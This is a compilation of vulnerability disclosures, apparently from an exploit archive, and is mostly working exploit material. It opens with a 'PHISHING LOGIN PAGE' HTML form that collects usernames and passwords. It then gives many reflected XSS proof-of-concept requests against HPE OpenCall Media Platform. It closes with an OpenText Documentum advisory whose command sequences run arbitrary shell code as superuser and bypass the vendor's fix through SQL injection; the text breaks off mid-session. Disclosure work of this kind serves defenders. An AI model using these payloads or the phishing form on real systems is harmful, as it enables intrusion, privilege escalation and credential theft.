function onLoginFornLoad() {
document.getElementById("txtUsername").focus();
}
</script>
<style type="text/css">
.style1
{
width: 290px;
}
.style2
{
width: 285px;
}
</style>
</head>
<body onload="onLoginFornLoad()">
<h2>PHISHING LOGIN PAGE</h2>
<script>document.write("I`m also running JS");</script>
<form action="j_security_check" method="POST">
<table cellpadding="0" cellspacing="0" width="100%" height="100%"
style="background-color: #ffffff">
<tr>
<td align="center" valign="middle">
<table cellpadding="0" cellspacing="0" height="309"
style="border: 1px solid #000000; background-position:
left top; background-image:url('/login/images/hp_logo.png');
background-repeat: no-repeat; width: 576px; clip: rect(1px, auto,
auto, auto);" >
<tr>
<td class="style2"> </td>
<td class="style1">
<table cellpadding="0" cellspacing="0">
<tr>
<td width="60"
style="font-family: Arial, Helvetica,
sans-serif; color: #000000; font-weight: bold">
User Name </td>
<td><input name="j_username" type="text" size="14"
style="width: 193px;"
id="txtUsername" value=""></td>
</tr>
<tr><td colspan="2" height="3"></td></tr>
<tr>
<td style="font-family: Arial, Helvetica,
sans-serif; font-weight: bold">Password </td>
<td><input name="j_password" type="password"
size="14" style="width: 191px"></td>
</tr>
<tr><td colspan="2" height="3"></td></tr>
<tr><td colspan="2"> </td></tr>
<td colspan="2" align="right">
<button type="submit" value="Log in"
style="width:54px; margin-top:8px">Login</button>
</td>
</tr>
</table>
</td>
<td style="background-color: #FFFFFF"> </td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
Platform Administration Tool – Reflected Cross-Site Scripting (XSS)
that lead to Remote Code Execution
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function with parameter cmd=DisplayBaseCdrBrowsePage. An attacker can
inject malicious Java script to trigger the Cross-Site Scripting
(XSS).
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3<script>alert(1)<%2fscript>1d8b4&sessionType=NONE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFMonitorMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE0 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985″><script>alert(1)<
%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985"><script>alert(1)<%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE1 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a”><script>alert(1)<
%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a"><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE2 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2″><script>alert(1)<
%2fscript>54f45&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2"><script>alert(1)<%2fscript>54f45&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE3 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32″><script>alert(1)<
%2fscript>54a0f
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32"><script>alert(1)<%2fscript>54a0f
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME0 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802″><script>alert(1)<
%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0fa802"><script>alert(1)<%2fscript>671a8&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME1 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e”><script>alert(1)<
%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1f530e"><script>alert(1)<%2fscript>d677f&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME2 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f”><script>alert(1)<
%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N261a9f"><script>alert(1)<%2fscript>118f3&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NAME3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NAME3 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8″><script>alert(1)<
%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N30c4b8"><script>alert(1)<%2fscript>c10b2&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – GetMapAction function
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a”><script>alert(1)<
%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTMLaec5a"><script>alert(1)<%2fscript>70733&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_NUM parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_NUM input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d”><script>alert(1)<
%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=00b96d"><script>alert(1)<%2fscript>58400&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – NAME parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter NAME input. An attacker can inject malicious Java
script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0″><script>alert(1)<
%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root8c0d0"><script>alert(1)<%2fscript>b811a&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function parameter next input. An attacker can inject malicious Java
script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: GET
/OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<
%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/cdrdispatch?sessionType=ACTIVE&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePagea908f<script>alert(1)<%2fscript>2f6bfa40b3d&CallSessionList=ACTIVE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – next parameter
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function parameter sessionType input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/cdrdispatch?sessionType=25ed6″><script>alert(1)<
%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/cdrdispatch?sessionType=25ed6"><script>alert(1)<%2fscript>1b604fa73f3&cmd=ViewActiveCalls&next=DisplayBaseCdrBrowsePage&CallSessionList=ACTIVE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePage&sessionType=NONE
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
CVE’s
CVE-2017-5799 – Remote Code Execution
CVE-2017-5798 – Reflected Cross-Site Scripting (XSS)
'''
CVE Identifier: CVE-2017-7221
Vendor: OpenText
Affected products: OpenText Documentum Content Server (all versions)
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Fix: not available
PoC: https://gist.github.com/andreybpanfilov/0a4fdfad561e59317a720e702b0fec44
Description:
all versions of Documentum Content Server contain dm_bp_transition docbase
method ("stored procedure”) which is written on basic, implementation of this docbase
methods does not properly validate user input which allows attacker to execute arbitrary
code with superuser privileges.
Related code snippet is:
==========================================8<========================================
'Evaluate the user-defined entry criteria
If (result = True And run_entry = "T") Then
If (debug = True) Then
PrintToLog sess, "Run user defined entry criteria."
End If
'
' researcher comment:
' userEntryID parameter is controlled by attacker
'
result = RunProcedure(userEntryID, 1, sess, sysID,_
user_name, targetState)
End If
...
'
' researcher comment:
' procID parameter is controlled by attacker
'
Function RunProcedure(procID As String, procNo As Integer,_
sessID As String, objID As String, userName As String,_
targetState As String) As Boolean
...
StartIt:
If (procID <> "0000000000000000") Then
result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
'
' researcher comment:
' here basic interpreter loads content of user-provided script
' from underlying repostiory using following technique:
'
' checking that it is dealing with dm_procedure object
' (check was introduced in CVE-2014-2513):
' id,c,dm_procedure where r_object_id='procID'
'
' getting content of basic script
' fetch,c,procID
' getpath,c,l
'
result = external(procID)
If (result = True) Then
If (procNo = 1) Then
' --- Running user-defined entry criteria ---
result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
On Error Goto NoFunction
'
' researcher comment
' here dmbasic interpreter executes user defined function
'
result = EntryCriteria(sessID, objID, userName,_
targetState, errorStack)
If (result = False) Then
errorStack = "[ErrorCode] 1500 [ServerError] " + _
errorStack
End If
==========================================>8========================================
So, attacker is able to create it’s own basic procedure in repository and pass it’s identifier
as argument for dm_bp_transition procedure:
==========================================8<========================================
$ cat /tmp/test
cat: /tmp/test: No such file or directory
$ cat > test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): unprivileged_user
Please enter password for unprivileged_user:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.1000.0027
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800b1a37
started for user unprivileged_user."
Connected to Documentum Server running Release 6.7.1090.0170 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920804e5416
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='dm_bp_transition',
arguments='repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 0801d920804e5416 0000000000000000 0000000000000000
0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000'
(1 row affected)
API> Bye
$ cat /tmp/test
dm_bp_transition_has_vulnerability
==========================================>8========================================
Vendor was been notified about this vulnerability on November 2013 using customer
support channel, after a while vendor started claiming that this vulnerability
was remediated, though no CVE was announced. Moreover, the fix was contested
and CERT/CC started tracking this vulnerability, the PoC provided
to CERT/CC was:
==========================================8<========================================
Vendor have decided that the root cause of problem is users are able to
create dm_procedure objects, and now in Documentum Content Server
v6.7SP1P26 we have following behavior:
[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f0174 started for
user unprivileged_user."
Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
Session id is s0
API> create,c,dm_procedure
...
0801d920805929d0
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."
BUT:
API> create,c,dm_document
...
0901d920805929dd
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with
method='dm_bp_transition',arguments='repo repo dmadmin ""
0000000000000000 0000000000000000 0000000000000000 0901d920805929dd
0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T
dmadmin 0000000000000000'
(1 row affected)
....
API> Bye
~]$ cat /tmp/test
dm_bp_transition_has_vulnerability
~]$
==========================================>8========================================
On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated.
On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor
constantly fails to provide status of reported vulnerabilities) by providing another proof of concept,
description provided to CERT/CC was:
==========================================8<========================================
I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following
error:
[ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected
error: [DM_API_W_NO_MATCH]warning: "There was no match in the
docbase for the qualification: dm_procedure where r_object_id =
'0801fd08805c9dfe'"
Such behaviour means that EMC tried to remediate a security issue by
"checking" object type of supplied object:
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe'
...
[DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the
qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'"
API> Bye
bin]$ strings dmbasic| grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
# old version of dmbasic binary
bin]$ strings dmbasic| grep dm_procedure
bin]$
So, the fix was implemented in dmbasic binary, the problem is neither 6.7
SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch
that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the
issue is still reproducible because introduced check could be bypassed
using SQL injection:
~]$ cat test.ebs
Public Function EntryCriteria(ByVal SessionId As String,_
ByVal ObjectId As String,_
ByVal UserName As String,_
ByVal TargetState As String,_
ByRef ErrorString As String) As Boolean
t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")
EntryCriteria=True
End Function
~]$ cat /tmp/test
cat: /tmp/test: No such file or directory
~]$ iapi
Please enter a docbase name (docubase): repo
Please enter a user (dmadmin): test01
Please enter password for test01:
EMC Documentum iapi - Interactive API interface
(c) Copyright EMC Corp., 1992 - 2011
All rights reserved.
Client Library Release 6.7.2190.0142
Connecting to Server using docbase repo
[DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for
user test01."
Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle
Session id is s0
API> create,c,dm_sysobject
...
0801fd08805c9dfe
API> set,c,l,object_name
SET> test
...
OK
API> setfile,c,l,test.ebs,crtext
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
repo repo dmadmin "" 0000000000000000 0000000000000000
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
from dm_sysobject where r_object_id=''0801fd08805c9dfe"
0000000000000000 0000000000000000 0000000000000000 ""
0 0 T F T T dmadmin 0000000000000000'
...
(1 row affected)
API> Bye
